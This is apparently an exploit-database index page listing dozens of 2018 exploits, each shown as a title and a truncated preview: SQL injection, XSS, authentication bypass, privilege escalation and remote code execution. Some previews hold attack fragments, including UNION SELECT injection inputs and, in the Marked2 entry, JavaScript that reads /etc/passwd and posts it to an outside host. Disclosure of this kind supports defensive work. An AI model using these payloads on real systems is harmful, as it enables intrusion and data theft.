Juju-run Agent - Privilege Escalation (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Juju-run Agent Privilege Escalation', 'Description' = %q This module attempts to gain root privileges on Juju agent systems running the juju-run...
LogicalDOC Enterprise 7.7.4 - Directory Traversal
LogicalDOC Enterprise 7.7.4 Multiple Directory Traversal Vulnerabilities Vendor: LogicalDOC Srl Product web page: https://www.logicaldoc.com Affected version: 7.7.4 7.7.3 7.7.2 7.7.1 7.6.4 7.6.2 7.5.1 7.4.2 7.1.1 Summary: LogicalDOC is a free document management system that is designed to handle...
Paypal Clone Script 1.0.9 - 'id' / 'acctype' SQL Injection
Exploit Title: Paypal / Money Transfer Clone Script 1.0.9 - SQL Injection Dork: N/A Date: 2018-02-10 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendor Homepage: https://www.phpscriptsmall.com/product/paypal-money-transfer-clone/ Version: 1.0.9 Category: Webapps CVE: N/...
Readymade Video Sharing Script 3.2 - 'search' SQL Injection
Exploit Title: Readymade Video Sharing Script - SQL Injection Error Based Google Dork: NA Date: 10.02.2018 Exploit Author: Varun Bagaria Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/php-video-sharing-script/ Version: 3.2 Tested on: Windows...
Schools Alert Management Script 2.0.2 - Arbitrary File Upload
Schools Alert Management Script 2.0.2 - Arbitrary File Upload. CVE-2018-6860. Webapps exploit for PHP platform Exploit Title: Schools Alert Management Script - 2.0.2 - Arbitrary File Upload / Remote Code Execution Date: 07.02.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link:...
Facebook Clone Script 1.0.5 - Cross-Site Scripting
Facebook Clone Script 1.0.5 - Cross-Site Scripting. CVE-2018-6858. Webapps exploit for PHP platform Exploit Title: Facebook Clone Script 1.0.5 - Stored XSS Date: 07.02.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/naukri-clone-script/...
Multi religion Responsive Matrimonial 4.7.2 - Cross-Site Scripting
Multi religion Responsive Matrimonial 4.7.2 - Cross-Site Scripting. CVE-2018-6864. Webapps exploit for PHP platform Exploit Title: Multi religion Responsive Matrimonial - 4.7.2 - Stored XSS Date: 07.02.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link:...
LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure
Vulnerability description CVE-2018-6871 First part LibreOffice supports COM.MICROSOFT.WEBSERVICE function: https://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4 The function is required to obtain data by URL, usually used as:...
Naukri Clone Script 3.0.3 - 'indus' SQL Injection
Exploit Title: Naukri Clone Script 3.0.3 - 'indus' SQL Injection Dork: N/A Date: 2018-02-08 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendor Homepage: https://www.phpscriptsmall.com/product/naukri-clone-script/ Version: 3.0.3 Category: Webapps CVE: N/A Description: Th...
Select Your College Script 2.0.2 - Authentication Bypass
Select Your College Script 2.0.2 - Authentication Bypass. CVE-2018-6863. Webapps exploit for PHP platform Exploit Title: Select Your College Script - 2.0.2 - Authentication Bypass Date: 07.02.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software...
Bitcoin MLM Software 1.0.2 - Cross-Site Scripting
Bitcoin MLM Software 1.0.2 - Cross-Site Scripting. CVE-2018-6862. Webapps exploit for PHP platform Exploit Title: Bitcoin MLM Software 1.0.2 - Stored XSS Date: 07.02.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/bitcoin-mlm/ Category:...
JBoss 4.2.x/4.3.x - Information Disclosure
JBoss 4.2.x/4.3.x - Information Disclosure. CVE-2010-1429. Remote exploit for Multiple platform Exploit Title: JBoss sensitive information disclosure 4.2X & 4.3.X Date: 02/08/2018 Exploit Author: JameelNabbo Vendor Homepage: http://www.jboss.org Software Link: http://jbossas.jboss.org/downloads...
Lawyer Search Script 1.0.2 - Cross-Site Scripting
Lawyer Search Script 1.0.2 - Cross-Site Scripting. CVE-2018-6861. Webapps exploit for PHP platform Exploit Title: Lawyer Search Script - 1.0.2 - Stored XSS Date: 07.02.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/lawyer-script/...
Multi Language Olx Clone Script - Cross-Site Scripting
Exploit Title: Multi Language Olx Clone Script - Stored XSS Date: 08.02.2018 Exploit Author: Varun Bagaria Web: Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/olx-clone/ Category: Web Application Version:2.0.6 Tested on: Windows 7 CVE: NA...
macOS Kernel - Use-After-Free Due to Lack of Locking in 'AppleEmbeddedOSSupportHostClient::registerNotificationPort'
/ AppleEmbeddedOSSupportHost.kext is presumably involved in the communication with the OS running on the touch bar on new MBP models. Here's the userclient's registerNotificationPort method: text:0000000000002DE4 ; AppleEmbeddedOSSupportHostClient::registerNotificationPortipcport , unsigned int,...
Naukri Clone Script - Persistent Cross-Site Scripting
Naukri Clone Script - Persistent Cross-Site Scripting. Webapps exploit for PHP platform. Tags: Cross-Site Scripting XSS Exploit Title: Naukri Clone Script - Stored XSS Date: 06.02.2018 Exploit Author: Prasenjit Kanti Paul Web: http://hack2rule.wordpress.com/ Vendor Homepage:...
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution
Exploit Title: Adobe Coldfusion BlazeDS Java Object Deserialization RCE Date: February 6, 2018 Exploit Author: Faisal Tameesh @DreadSystems Company: Depth Security https://depthsecurity.com Version: Adobe Coldfusion 11.0.03.292866 Tested On: Windows 10 Enterprise 10.0.15063 CVE: CVE-2017-3066...
Android - 'getpidcon' Permission Bypass in KeyStore Service
The keystore binder service "android.security.IKeystoreService" allows users to issue several commands related to key management, including adding, removing, exporting and generating cryptographic keys. The service is accessible to many SELinux contexts, including application contexts, but also...
Multilanguage Real Estate MLM Script - Persistent Cross-Site Scripting
Multilanguage Real Estate MLM Script - Persistent Cross-Site Scripting. Webapps exploit for PHP platform. Tags: Cross-Site Scripting XSS Exploit Title: Multilanguage Real Estate MLM Script - Stored XSS Date: 06.02.2018 Exploit Author: Prasenjit Kanti Paul Web: http://hack2rule.wordpress.com/ Vend...
Entrepreneur Dating Script 2.0.2 - Authentication Bypass
Exploit Title: Entrepreneur Dating Script 2.0.2 - Authentication Bypass Dork: N/A Date: 2018-02-07 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendor Homepage: https://www.phpscriptsmall.com/product/entrepreneur-dating-script/ Version: 2.0.2 Category: Webapps CVE: N/A...
Cisco ASA - Crash (PoC)
Cisco ASA CVE-2018-0101 Crash PoC We basically just read: https://www.nccgroup.trust/globalassets/newsroom/uk/events/2018/02/reconbrx2018-robin-hood-vs-cisco-asa.pdf @zerosum0x0, @jennamagius, @alephnaught import requests, sys headers = headers'User-Agent' = 'Open AnyConnect VPN Agent...
Hot Scripts Clone Script Classified - Persistent Cross-Site Scripting
Hot Scripts Clone Script Classified - Persistent Cross-Site Scripting. Webapps exploit for PHP platform. Tags: Cross-Site Scripting XSS Exploit Title: Hot Scripts Clone : Script Classified - Stored XSS Date: 06.02.2018 Exploit Author: Prasenjit Kanti Paul Web: http://hack2rule.wordpress.com/ Vend...
Online Test Script 2.0.7 - 'cid' SQL Injection
Exploit Title: Online Test Script 2.0.7 - 'cid' SQL Injection Dork: N/A Date: 2018-02-07 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendor Homepage: https://www.phpscriptsmall.com/product/online-test-script/ Version: 2.0.7 Category: Webapps CVE: N/A Description: The...
Doctor Search Script 1.0.2 - Persistent Cross-Site Scripting
Doctor Search Script 1.0.2 - Persistent Cross-Site Scripting. CVE-2018-6655. Webapps exploit for PHP platform. Tags: Cross-Site Scripting XSS Exploit Title: PHP Scripts Mall Doctor Search Script 1.0.2 has Stored XSS. Date: 06.02.2018 Exploit Author: Prasenjit Kanti Paul Web:...
Asterisk 13.17.2 - 'chan_skinny' Remote Memory Corruption
Exploit Author: Juan Sacco - http://exploitpack.com Vulnerability found using Exploit Pack v10 - Fuzzer module CVE-2017-17090 - AST-2017-013 Tested on: Asterisk 13.17.2dfsg-2 Description: Asterisk is prone to a remote unauthenticated memory exhaustion The vulnerability is due to an error when the...
MalwareFox AntiMalware 2.74.0.150 - Privilege Escalation
/ Title: MalwareFox AntiMalware 2.74.0.150 - Local Privilege Escalation Date: 03/02/2018 Author: Souhail Hammou Vendor Homepage: https://www.malwarefox.com/ Version: 2.74.0.150 Tested on: Windows 7 32-bit / Windows 10 64-bit CVE: CVE-2018-6606 / include include include BOOL...
Marked2 - Local File Disclosure
var file = "file:///etc/passwd"; var extract = "http://dev.example.com:1337/"; function geturl var xmlHttp = new XMLHttpRequest; xmlHttp.open"GET", url, false; xmlHttp.sendnull; return xmlHttp.responseText; function stealdata var xhr = new XMLHttpRequest; xhr.open'POST', extract, true; xhr.onload...
MalwareFox AntiMalware 2.74.0.150 - Local Privilege Escalation
/ Title : MalwareFox AntiMalware 2.74.0.150 - Local Privilege Escalation Date : 02/02/2018 Author : Souhail Hammou Vendor Homepage : https://www.malwarefox.com/ Version : 2.74.0.150 Tested on : Windows 7 32-bit / Windows 10 64-bit CVE : CVE-2018-6593 / include include include include pragma...
Joomla! Component Zh YandexMap 6.2.1.0 - 'id' SQL Injection
input name="id" value="-11 UNION ALL SELECT...
HPE iLO 4 < 2.53 - Add New Administrator User
!/usr/bin/env python """ Exploit trigger was presented @reconbrx 2018 Vulnerability found and documented by synacktiv: https://www.synacktiv.com/posts/exploit/rce-vulnerability-in-hp-ilo.html Original advisory from HP: https://support.hpe.com/hpsc/doc/public/display?docId=hpesbhf03769enus Other...
Joomla! Component JSP Tickets 1.1 - SQL Injection
Exploit Title: Joomla! Component JSP Tickets 1.1 - SQL Injection Dork: N/A Date: 04.02.2018 Vendor Homepage: http://joomlaserviceprovider.com/ Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/help-desk/jsp-tickets/ Version: 1.1 Category: Webapps Tested on:...
Apport/ABRT - 'chroot' Local Privilege Escalation (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Apport / ABRT chroot Privilege Escalation', 'Description' = %q This module attempts to gain root privileges on Linux systems by invoking the...
Claymore Dual GPU Miner 10.5 - Format String
Claymore’s Dual GPU Miner 10.5 and below is vulnerable to a format strings vulnerability. This allows an unauthenticated attacker to read memory addresses, or immediately terminate the mining process causing a denial of service. After reading about the recent vulnerabilities with previous version...
NixCMS 1.0 - 'category_id' SQL Injection
Exploit Title: NixCMS 1.0 - 'category_id' SQL Injection Dork: N/A Date: 03.02.2018 Vendor: https://www.nixdesign.de Software Link: https://www.nixdesign.de/nix-cms/ Demo: http://www.jamaram.de/ Version: 1.0 Tested on: WiN10X64 Exploit Author: Bora Bozdogan Author WebSite : http://borabozdogan.net....
Matrimonial Website Script 2.1.6 - 'uid' SQL Injection
Exploit Title: Matrimonial Website Script 2.1.6 - 'uid' SQL Injection Dork: N/A Date: 2018-02-03 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendor Homepage: https://www.phpscriptsmall.com/product/matrimonial-website-script/ Version: 2.1.6 Category: Webapps CVE: N/A...
Wonder CMS 2.3.1 - 'Host' Header Injection
Exploit Title: Wonder CMS 2.3.1 Host Header Injection Date: 30-01-2018 Exploit Author: Samrat Das Contact: http://twitter.com/SamratDas93 Website: https://securitywarrior9.blogspot.in/ Vendor Homepage: https://www.wondercms.com/ Version: 2.3.1 CVE : CVE-2017-14523 Category: Webapp CMS 1...
BOCHS 2.6-5 - Local Buffer Overflow
Exploit Author: Juan Sacco - http://exploitpack.com Vulnerability found using Exploit Pack v10 - Fuzzer module An attacker could exploit this vulnerability to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition. Program...
Joomla! Component jLike 1.0 - Information Leak
"; foreach$l as $u echo "- ID\n\n\n\n:\n" .$u'id'.""; echo "- Name\n\n:\n" .$u'name'.""; echo "- Email\n:\n" .$u'email'.""; echo ""; echo "-----------------------------"; elseecho "- No user"; ?...
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework Windows XP systems that are not part of a domain default to treating all network logons as if they were Guest. This prevents SMB relay attacks from gaining administrativ...
Wonder CMS 2.3.1 - Unrestricted File Upload
Affected Code: public static function uploadFile + - if ! wCMS::$loggedIn && ! isset$FILES'uploadFile' && ! isset$REQUEST'token' return; + private static function uploadFileAction - if isset$REQUEST'token' && $REQUEST'token' == wCMS::generateToken && isset$FILES'uploadFile' Proof of Concept Steps...
Netis WF2419 Router - Cross-Site Scripting
Exploit Title: Netis-WF2419 HTML Injection Date: 20/01/2018 Exploit Author: Sajibe Kanti Author Contact :https://twitter.com/@sajibekantibd Vendor Homepage: http://www.netis-systems.com/ Version: Netis-WF2419 , V3.2.41381 Tested on: Windows 10 CVE : CVE-2018-6190 HTML Injection in Netis-WF2419...
Online Voting System - Authentication Bypass
Exploit Title: Online Voting System - Authentication Bypass Date: 02.02.2018 Vendor Homepage: http://themashabrand.com Software Link: http://themashabrand.com/p/votin Demo: http://localhost/Onlinevoting Version: 1.0 Category: Webapps Exploit Author: Giulio Comi CVE : CVE-2018-6180 Description A...
Joomla! Component Zh GoogleMap 8.4.0.0 - SQL Injection
input name="id" value="-11 UNION ALL SELECT...
Student Profile Management System Script 2.0.6 - Authentication Bypass
Exploit title: Student Profile Management System Script 2.0.6 - Admin Panel Authentication Bypass Dork: "Powered by: i-Net Solution" Date: 2018-02-06 Exploit Author: Borna nematzadeh L0RD or [email protected] Vendor Homepage:...
WordPress Core - 'load-scripts.php' Denial of Service
EDB Note: python doser.py -g...
Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection
input name="id" value="-11 UNION ALL SELECT...
Joomla! Component JE PayperVideo 3.0.0 - 'usr_plan' SQL Injection
...
Real Estate Custom Script - 'route' SQL Injection
Exploit Title: Real Estate Custom Script - 'route' SQL Injection Date: 2018-01-31 Exploit Author: 8bitsec Vendor Homepage: https://codecanyon.net/ Software Link: https://codecanyon.net/item/real-estate-custom-script/21268075 Version: 1.0 Tested on: Kali Linux 2.0 | Mac OS 10.13.3 Email:...
Joomla! Component JEXTN Reverse Auction 3.1.0 - SQL Injection
Exploit Title: Joomla! Component JEXTN Reverse Auction 3.1.0 - SQL Injection Dork: N/A Date: 01.02.2018 Vendor Homepage: http://jextn.com/ Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/auction/jextn-reverse-auction/ Version: 3.1.0 Category: Webapps Tested on:...
Linux/x64 - Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) Shellcode
Linux/x64 - Twofish Encoded + DNS CNAME Password + execve/bin/sh Shellcode. Shellcode exploit for Linuxx86-64 platform /----- Crypter.c ----- / / Optimized Twofish C implementation by Drew Csillag: https://www.schneier.com/code/twofish-cpy.zip Partially re-written by Andre Lima...